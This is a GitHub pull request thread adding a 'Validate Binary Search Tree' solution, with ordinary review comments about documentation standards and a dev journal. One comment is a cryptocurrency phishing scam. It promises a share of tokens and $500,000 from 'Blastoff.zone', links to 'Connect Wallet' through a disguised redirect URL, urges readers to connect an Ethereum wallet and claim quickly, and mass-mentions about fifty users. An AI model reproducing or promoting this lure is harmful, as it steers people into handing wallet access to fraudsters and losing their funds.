### PR TITLE
Validate Binary Search Tree Solution

### PR DESCRIPTION
**Pull request by YanniTrim**
Added Validate Binary Search Tree Solution in Medium Folder

### CODE REVIEW

**Review by ando-huang — APPROVED** [review]
Nice! Now that we have this, I think it'd be helpful to start adding documentation about how you reached this solution, how it works, bugs you encountered and how you solved them.

**Comment by YanniTrim** [comment]
> Nice! Now that we have this, I think it'd be helpful to start adding documentation about how you reached this solution, how it works, bugs you encountered and how you solved them.

I'll add that when I push in the rest of the solutions I did, definitely a good idea! Should I just do that in the comments in the code?

**Comment by ando-huang** [comment]
That's up to you, I'll put up some examples this weekend and we can talk about the options.

check out [JavaDoc](https://www.oracle.com/technical-resources/articles/java/javadoc-tool.html#format) for some standards, in python (PEP8)[https://peps.python.org/pep-0008/#introduction] is a good reference, as well as including style for standardization. 

On this particular problem we had the issue with Min/Max values, that's not something worth mentioning in the doc of what it does and how, but in a separate text file we could have a log of issues encountered and solutions. Basically writing a dev journal as you solve the problem, verbose and something to reference if the code + docs aren't enough to review with.

**Comment by phieule2024** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Firidonov, @Kalissaac, @labid, @Klaireo, @mohdwazid, @phanupongr, @rego21, @fjosw, @JoyCood, @luugiathuy, @jhdcruz, @Lay523, @mtwilliams, @atdan, @gitalvininfo, @XsssTsssX, @athulspal, @ritarock, @bowbowzai, @wlchn, @kiloc, @PandaRSR, @ChaoPeng13, @kool123r5, @anyDroidzOS, @philbawa, @hmnstf, @Humaather, @owengiit, @jrgarner1, @roigecode, @bootsish, @XiFYuW, @dougettsjr, @ivanachillee, @atharvanaphade, @lancenonce, @LahiaOmar, @jiang123zhe-CN, @jumodada, @AlexanderDev2004, @AlvaroEmanuel20, @popraf, @zhangheyin, @grmpyninja, @maweiyi, @rltbg, @ebukahills, @ashinewu, @Auxburger

**Pull request merged**
